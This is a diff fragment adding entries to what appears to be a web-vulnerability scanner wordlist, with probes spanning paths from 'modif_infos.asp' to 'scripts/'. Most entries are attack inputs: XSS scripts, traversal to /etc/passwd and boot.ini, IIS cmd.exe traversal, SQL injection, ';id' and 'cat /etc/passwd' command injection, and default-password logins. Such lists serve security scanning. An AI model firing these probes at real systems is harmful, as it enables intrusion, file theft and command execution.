+ modif_infos.asp?n=c:\boot.ini
2642
+ mods/apage/apage.cgi?f=file.htm.|id|
2643
+ modsecurity.php
2644
+ modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
2645
+ modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
2646
+ modules.php?name=Downloads&d_op=viewdownload
2647
+ modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
2648
+ modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
2649
+ modules.php?name=Members_List&sql_debug=1
2650
+ modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
2651
+ modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
2652
+ modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
2653
+ modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
2654
+ modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
2655
+ modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
2656
+ modules.php?op=modload&name=0&file=0
2657
+ modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
2658
+ modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
2659
+ modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
2660
+ modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
2661
+ modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
2662
+ modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
2663
+ modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
2664
+ modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
2665
+ modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
2666
+ modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
2667
+ modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
2668
+ modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
2669
+ modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
2670
+ modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
2671
+ modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
2672
+ modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
2673
+ modules/Downloads/voteinclude.php+
2674
+ modules/Forums/attachment.php
2675
+ modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
2676
+ modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
2677
+ modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
2678
+ modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
2679
+ modules/Search/index.php
2680
+ modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
2681
+ modules/WebChat/in.php+
2682
+ modules/WebChat/out.php
2683
+ modules/WebChat/quit.php
2684
+ modules/WebChat/users.php
2685
+ modules/Your_Account/navbar.php+
2686
+ moin.cgi?test
2687
+ mojo/mojo.cgi
2688
+ moregroupware/modules/webmail2/inc/
2689
+ movimientos/
2690
+ mp3/
2691
+ mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
2692
+ mqseries/
2693
+ mrtg.cfg?cfg=../../../../../../../../etc/passwd
2694
+ mrtg.cgi?cfg=../../../../../../../../etc/passwd
2695
+ mrtg.cgi?cfg=blah
2696
+ ms_proxy_auth_query/
2697
+ msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
2698
+ msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
2699
+ msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
2700
+ msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
2701
+ msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
2702
+ msadc/msadcs.dll
2703
+ msadc/samples/adctest.asp
2704
+ msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
2705
+ msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
2706
+ msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
2707
+ msdwda.nsf
2708
+ mspress30/
2709
+ msql/
2710
+ msword/
2711
+ mt-static/
2712
+ mt-static/mt-check.cgi
2713
+ mt-static/mt-load.cgi
2714
+ mt-static/mt.cfg
2715
+ mt/
2716
+ mt/mt-check.cgi
2717
+ mt/mt-load.cgi
2718
+ mt/mt.cfg
2719
+ mtatbls.nsf
2720
+ mtdata/mtstore.nsf
2721
+ mtstore.nsf
2722
+ multihtml.pl?multi=/etc/passwd%00html
2723
+ musicqueue.cgi
2724
+ myguestBk/add1.asp?|-|0|404_Object_Not_Found
2725
+ myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
2726
+ myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
2727
+ myguestbook.cgi?action=view
2728
+ myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
2729
+ myinvoicer/config.inc
2730
+ mylog.html?screen=/etc/passwd
2731
+ mylog.phtml?screen=/etc/passwd
2732
+ myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
2733
+ myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
2734
+ mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
2735
+ na_admin/
2736
+ na_admin/ataglance.html
2737
+ namazu.cgi
2738
+ names.nsf
2739
+ nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
2740
+ nbmember.cgi?cmd=list_all_users
2741
+ ncl_items.html
2742
+ ncl_items.shtml?SUBJECT=1
2743
+ ncommerce3/ExecMacro/macro.d2w/%0a%0a
2744
+ ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
2745
+ netauth.cgi?cmd=show&page=../../../../../../../../../../etc
2746
+ netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
2747
+ netbasic/websinfo.bas
2748
+ netget?sid=Safety&amp;msg=2002&amp;file=Safety
2749
+ netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
2750
+ netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
2751
+ nethome/
2752
+ netpad.cgi
2753
+ netscape/
2754
+ netutils/findata.stm?host=<script>alert(document.cookie)</script>
2755
+ netutils/findata.stm?user=<script>alert(document.cookie)</script>
2756
+ netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
2757
+ netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
2758
+ new
2759
+ new/
2760
+ news
2761
+ news/news.mdb
2762
+ newsdesk.cgi?t=../../../../../../../../../../etc
2763
+ newsdesk.cgi?t=../../../../../../../../../../etc/passwd
2764
+ newtopic.php
2765
+ newuser?Image=../../database/rbsserv.mdb
2766
+ nikto.ida
2767
+ nimages.php
2768
+ nl/
2769
+ nlog-smb.cgi
2770
+ nlog-smb.pl
2771
+ nntp/nd000000.nsf
2772
+ nntp/nd000001.nsf
2773
+ nntp/nd000002.nsf
2774
+ nntp/nd000003.nsf
2775
+ nntp/nd000004.nsf
2776
+ nntppost.nsf
2777
+ node/view/666\"><script>alert(document.domain)</script>
2778
+ non-existent.pl
2779
+ noshell
2780
+ nosuchurl/><script>alert('Vulnerable')</script>
2781
+ notes.nsf
2782
+ noticias/
2783
+ nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
2784
+ nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
2785
+ nph-error.pl
2786
+ nph-exploitscanget.cgi
2787
+ nph-maillist.pl
2788
+ nph-publish
2789
+ nph-publish.cgi
2790
+ nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
2791
+ nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
2792
+ nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
2793
+ nph-test-cgi
2794
+ nphp/nphpd.php
2795
+ npn_admn.nsf
2796
+ npn_rn.nsf
2797
+ ns-icons/
2798
+ nsn/..%5Cutil/attrib.bas
2799
+ nsn/..%5Cutil/chkvol.bas
2800
+ nsn/..%5Cutil/copy.bas
2801
+ nsn/..%5Cutil/del.bas
2802
+ nsn/..%5Cutil/dir.bas
2803
+ nsn/..%5Cutil/dsbrowse.bas
2804
+ nsn/..%5Cutil/glist.bas
2805
+ nsn/..%5Cutil/lancard.bas
2806
+ nsn/..%5Cutil/md.bas
2807
+ nsn/..%5Cutil/rd.bas
2808
+ nsn/..%5Cutil/ren.bas
2809
+ nsn/..%5Cutil/send.bas
2810
+ nsn/..%5Cutil/set.bas
2811
+ nsn/..%5Cutil/slist.bas
2812
+ nsn/..%5Cutil/type.bas
2813
+ nsn/..%5Cutil/userlist.bas
2814
+ nsn/..%5Cweb/env.bas
2815
+ nsn/..%5Cweb/fdir.bas
2816
+ nsn/..%5Cwebdemo/env.bas
2817
+ nsn/..%5Cwebdemo/fdir.bas
2818
+ nsn/env.bas
2819
+ nsn/fdir.bas
2820
+ nsn/fdir.bas:ShowVolume
2821
+ ntitar.pl
2822
+ ntsync4.nsf
2823
+ ntsync45.nsf
2824
+ nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
2825
+ nul..cfm
2826
+ nul..dbm
2827
+ nul.cfm
2828
+ nul.dbm
2829
+ null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
2830
+ oc/Search/SQLQHit.asp
2831
+ oc/Search/sqlqhit.asp
2832
+ odbc/
2833
+ oekaki/
2834
+ oem_webstage/cgi-bin/oemapp_cgi
2835
+ oem_webstage/oem.conf
2836
+ officescan/cgi/cgiChkMasterPwd.exe
2837
+ officescan/cgi/jdkRqNotify.exe
2838
+ officescan/hotdownload/ofscan.ini
2839
+ ojspdemos/basic/hellouser/hellouser.jsp
2840
+ ojspdemos/basic/simple/usebean.jsp
2841
+ ojspdemos/basic/simple/welcomeuser.jsp
2842
+ old/
2843
+ open?
2844
+ openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
2845
+ openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
2846
+ opendir.php?/etc/passwd
2847
+ opendir.php?requesturl=/etc/passwd
2848
+ oprocmgr-status
2849
+ options.inc.php+
2850
+ options.php?optpage=<script>alert('Vulnerable!')</script>
2851
+ oracle
2852
+ oradata/
2853
+ order/
2854
+ order/order_log.dat
2855
+ order/order_log_v12.dat
2856
+ orders/
2857
+ orders/checks.txt
2858
+ orders/mountain.cfg
2859
+ orders/order_log.dat
2860
+ orders/order_log_v12.dat
2861
+ orders/orders.log
2862
+ orders/orders.txt
2863
+ oscommerce/default.php
2864
+ outgoing/
2865
+ owa_util%2esignature
2866
+ ows-bin/oaskill.exe?abcde.exe
2867
+ ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
2868
+ ows-bin/perlidlc.bat?&dir
2869
+ ows/
2870
+ ows/restricted%2eshow
2871
+ pafiledb/includes/team/file.php
2872
+ page.cgi?../../../../../../../../../../etc/passwd
2873
+ pagelog.cgi
2874
+ pages/
2875
+ pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
2876
+ pals-cgi?palsAction=restart&documentName=/etc/passwd
2877
+ parse-file
2878
+ parse_xml.cgi
2879
+ pass
2880
+ pass_done.php
2881
+ passwd
2882
+ passwd.adjunct
2883
+ passwd.txt
2884
+ passwdfile
2885
+ password
2886
+ password.inc
2887
+ password/
2888
+ passwords.txt
2889
+ passwords/
2890
+ path/nw/article.php?id='
2891
+ pbcgi.cgi?name=Joe%Camel&email=%3C
2892
+ pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
2893
+ pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
2894
+ pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
2895
+ pbserver/pbserver.dll
2896
+ pccsmysqladm/incs/dbconnect.inc
2897
+ pdf/
2898
+ people.list
2899
+ perl
2900
+ perl-status
2901
+ perl.exe
2902
+ perl.exe?-v
2903
+ perl/
2904
+ perl/-e%20%22system('cat%20/etc/passwd');\%22
2905
+ perl/-e%20print%20Hello
2906
+ perl/env.pl
2907
+ perl/files.pl
2908
+ perl/printenv
2909
+ perl/samples/env.pl
2910
+ perl/samples/lancgi.pl
2911
+ perl/samples/ndslogin.pl
2912
+ perl/samples/volscgi.pl
2913
+ perl5/
2914
+ perl5/files.pl
2915
+ perl?-v
2916
+ perlshop.cgi
2917
+ perweb.nsf
2918
+ pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
2919
+ pfdispaly.cgi?../../../../../../../../../../etc
2920
+ pfdispaly.cgi?../../../../../../../../../../etc/passwd
2921
+ pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
2922
+ pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
2923
+ phf
2924
+ phf.cgi?QALIA
2925
+ phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
2926
+ phf?Qname=root%0Acat%20/etc/passwd%20
2927
+ phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
2928
+ phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
2929
+ phorum/admin/stats.php
2930
+ photo/
2931
+ photo/manage.cgi
2932
+ photo/protected/manage.cgi
2933
+ photo_album/apa_phpinclude.inc.php
2934
+ photodata/
2935
+ photodata/manage.cgi
2936
+ php-cgi
2937
+ php-coolfile/action.php?action=edit&file=config.php
2938
+ php.cgi?/etc/passwd
2939
+ php.ini
2940
+ php/
2941
+ php/gaestebuch/admin/index.php
2942
+ php/index.php
2943
+ php/mlog.html
2944
+ php/mlog.phtml
2945
+ php/mylog.html?screen=/etc/passwd
2946
+ php/mylog.phtml?screen=/etc/passwd
2947
+ php/php.exe?c:\boot.ini
2948
+ php/php.exe?c:\winnt\boot.ini
2949
+ php/php4ts.dll
2950
+ phpBB/phpinfo.php
2951
+ phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
2952
+ phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
2953
+ phpBB2/includes/db.php
2954
+ phpBB2/search.php?search_id=1\
2955
+ phpEventCalendar/file_upload.php
2956
+ phpMyAdmin/
2957
+ phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
2958
+ phpimageview.php?pic=javascript:alert('Vulnerable')
2959
+ phpinfo.php
2960
+ phpinfo.php3
2961
+ phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
2962
+ phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
2963
+ phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
2964
+ phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
2965
+ phpmyadmin/
2966
+ phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
2967
+ phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
2968
+ phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
2969
+ phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
2970
+ phprocketaddin/?page=../../../../../../../../../../boot.ini
2971
+ phprocketaddin/?page=../../../../../../../../../../etc/passwd
2972
+ phpshare/phpshare.php
2973
+ phptonuke.php?filnavn=/etc/passwd
2974
+ phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
2975
+ phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
2976
+ phpwebfilemgr/index.php?f=../../../../../../../../../etc
2977
+ phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
2978
+ phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
2979
+ phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
2980
+ phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
2981
+ phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
2982
+ phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
2983
+ pics/
2984
+ piranha/secure/passwd.php3
2985
+ pix/
2986
+ pks/lookup
2987
+ pls/admin
2988
+ pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
2989
+ pls/help/<script>alert('Vulnerable')</script>
2990
+ pls/ldc/admin_/
2991
+ pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
2992
+ pls/portal/HTP.PRINT
2993
+ pls/portal/PORTAL.home
2994
+ pls/portal/PORTAL.wwa_app_module.link
2995
+ pls/portal/PORTAL.wwv_dynxml_generator.show
2996
+ pls/portal/PORTAL.wwv_form.genpopuplist
2997
+ pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
2998
+ pls/portal/PORTAL.wwv_setting.render_css
2999
+ pls/portal/PORTAL.wwv_ui_lovf.show
3000
+ pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
3001
+ pls/portal/SELECT
3002
+ pls/portal/null
3003
+ pls/portal/owa_util.cellsprint?p_theQuery=select
3004
+ pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
3005
+ pls/portal/owa_util.listprint?p_theQuery=select
3006
+ pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
3007
+ pls/portal/owa_util.showsource?cname=owa_util
3008
+ pls/portal/owa_util.signature
3009
+ pls/portal30/admin_/
3010
+ pls/sample/admin_/help/..%255cplsql.conf
3011
+ pls/simpledad/admin_/
3012
+ pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
3013
+ pls/simpledad/admin_/dadentries.htm
3014
+ pls/simpledad/admin_/gateway.htm?schema=sample
3015
+ pls/simpledad/admin_/globalsettings.htm
3016
+ plusmail
3017
+ pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
3018
+ pm/lib.inc.php
3019
+ pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
3020
+ pmlite.php
3021
+ pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
3022
+ poll
3023
+ pollit/Poll_It_
3024
+ pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
3025
+ polls
3026
+ pollssi.cgi
3027
+ poppassd.php3+
3028
+ porn/
3029
+ post-query
3030
+ post16.exe
3031
+ post32.exe|dir%20c:\\
3032
+ post_query
3033
+ postcards.cgi
3034
+ postinfo.html
3035
+ postnuke/html/index.php?module=My_eGallery
3036
+ postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
3037
+ postnuke/index.php?module=My_eGallery
3038
+ postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
3039
+ powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
3040
+ powerup/r.cgi?FILE=../../../../../../../../../../passwd
3041
+ pp.php?action=login
3042
+ ppdscgi.exe
3043
+ pr0n/
3044
+ prd.i/pgen/
3045
+ printenv
3046
+ printenv.tmp
3047
+ privado/
3048
+ private.nsf
3049
+ private/
3050
+ probecontrol.cgi?command=enable&username=cancer&password=killer
3051
+ processit.pl
3052
+ prod/
3053
+ produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
3054
+ product_info.php
3055
+ productcart/database/EIPC.mdb
3056
+ productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
3057
+ profile.cgi
3058
+ profile.php?u=JUNK(8)
3059
+ profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
3060
+ profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
3061
+ project/index.php?m=projects&user_cookie=1
3062
+ prometheus-all/index.php
3063
+ pron/
3064
+ proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
3065
+ protected/
3066
+ protected/secret.html+
3067
+ protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
3068
+ protection.php
3069
+ proxy/ssllogin?user=administrator&password=administrator
3070
+ proxy/ssllogin?user=administrator&password=operator
3071
+ proxy/ssllogin?user=administrator&password=user
3072
+ prueba/
3073
+ pruebas/
3074
+ prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
3075
+ pt_config.inc
3076
+ ptg_upgrade_pkg.log
3077
+ pu3.pl
3078
+ pub/
3079
+ pub/english.cgi?op=rmail
3080
+ public.nsf
3081
+ public/
3082
+ publica/
3083
+ publicar/
3084
+ publico/
3085
+ publisher/
3086
+ publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
3087
+ purchase/
3088
+ purchases/
3089
+ put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
3090
+ pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
3091
+ pvote/ch_info.php?newpass=password&confirm=password%20
3092
+ pvote/del.php?pollorder=1%20
3093
+ pw/
3094
+ pw/storemgr.pw
3095
+ pwd.db
3096
+ python/
3097
+ qpadmin.nsf
3098
+ query
3099
+ query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
3100
+ query?mss=%2e%2e/config
3101
+ quickplace/quickplace/main.nsf
3102
+ quickstart/qstart50.nsf
3103
+ quickstart/wwsample.nsf
3104
+ quickstore.cgi?page=../../../../../../../../../../etc
3105
+ quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
3106
+ quikmail/nph-emumail.cgi?type=../%00
3107
+ quikstore.cfg
3108
+ quikstore.cgi
3109
+ quizme.cgi
3110
+ r.cgi?FILE=../../../../../../../../../../etc
3111
+ r.cgi?FILE=../../../../../../../../../../etc/passwd
3112
+ ratlog.cgi
3113
+ reademail.pl
3114
+ readme
3115
+ readme.eml
3116
+ readme.nsf
3117
+ readme.txt
3118
+ readmec.nsf
3119
+ readmes.nsf
3120
+ redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
3121
+ redirect
3122
+ register.cgi
3123
+ register/
3124
+ registered/
3125
+ replicator/webpage.cgi/
3126
+ replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
3127
+ reports.nsf
3128
+ reports/
3129
+ reports/rwservlet
3130
+ reports/rwservlet/getjobid4?server=myrep
3131
+ reports/rwservlet/getjobid7?server=myrep
3132
+ reports/rwservlet/showenv
3133
+ reports/rwservlet/showjobs
3134
+ reports/rwservlet/showmap
3135
+ reports/rwservlet/showmap?server=myserver
3136
+ reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
3137
+ reports/temp/
3138
+ reseller/
3139
+ responder.cgi
3140
+ restricted/
3141
+ retail/
3142
+ retrieve_password.pl
3143
+ reviews/newpro.cgi
3144
+ rguest.exe
3145
+ rightfax/fuwww.dll/?
3146
+ rksh
3147
+ rmp_query
3148
+ robadmin.cgi
3149
+ robpoll.cgi
3150
+ room/save_item.php
3151
+ root
3152
+ root/
3153
+ rpc.php?q="><script>alert(document.cookie)</script>
3154
+ rpc.php?q='&t='
3155
+ rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
3156
+ rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
3157
+ rpm_query
3158
+ rsh
3159
+ rtm.log
3160
+ rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
3161
+ rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3162
+ rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3163
+ rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3164
+ rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3165
+ rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3166
+ rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3167
+ rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3168
+ rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3169
+ rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3170
+ rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
3171
+ rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
3172
+ rwcgi60
3173
+ rwcgi60/showenv
3174
+ rwwwshell.pl
3175
+ sales/
3176
+ sam
3177
+ sam._
3178
+ sam.bin
3179
+ sample/
3180
+ sample/faqw46
3181
+ sample/framew46
3182
+ sample/pagesw46
3183
+ sample/siregw46
3184
+ sample/site1w4646
3185
+ sample/site2w4646
3186
+ sample/site3w4646
3187
+ samples/
3188
+ samples/search.dll?query=<script>alert(document.cookie)</script>
3189
+ samples/search/queryhit.htm
3190
+ save/
3191
+ sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
3192
+ sawmill?rfcf+%22
3193
+ sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
3194
+ sbcgi/sitebuilder.cgi
3195
+ sca/menu.jsp
3196
+ schema50.nsf
3197
+ scoadminreg.cgi
3198
+ scozbook/view.php?PG=whatever
3199
+ scr/
3200
+ scratch
3201
+ screen.php
3202
+ script>alert('Vulnerable')</script>.cfm
3203
+ scripts
3204
+ scripts/*%0a.pl
3205
+ scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
3206
+ scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
3207
+ scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
3208
+ scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
3209
+ scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
3210
+ scripts/CGImail.exe
3211
+ scripts/Carello/Carello.dll
3212
+ scripts/admin.pl
3213
+ scripts/cfgwiz.exe
3214
+ scripts/contents.htm
3215
+ scripts/convert.bas
3216
+ scripts/counter.exe
3217
+ scripts/cphost.dll
3218
+ scripts/cpshost.dll
3219
+ scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
3220
+ scripts/fpadmcgi.exe
3221
+ scripts/fpadmin.htm
3222
+ scripts/fpcount.exe
3223
+ scripts/fpremadm.exe
3224
+ scripts/fpsrvadm.exe
3225
+ scripts/httpodbc.dll
3226
+ scripts/iisadmin/bdir.htr
3227
+ scripts/iisadmin/ism.dll
3228
+ scripts/no-such-file.pl
3229
+ scripts/postinfo.asp
3230
+ scripts/proxy/w3proxy.dll
3231
+ scripts/repost.asp
3232
+ scripts/root.exe?/c+dir+c:\+/OG
3233
+ scripts/samples/ctguestb.idc
3234
+ scripts/samples/search/author.idq
3235
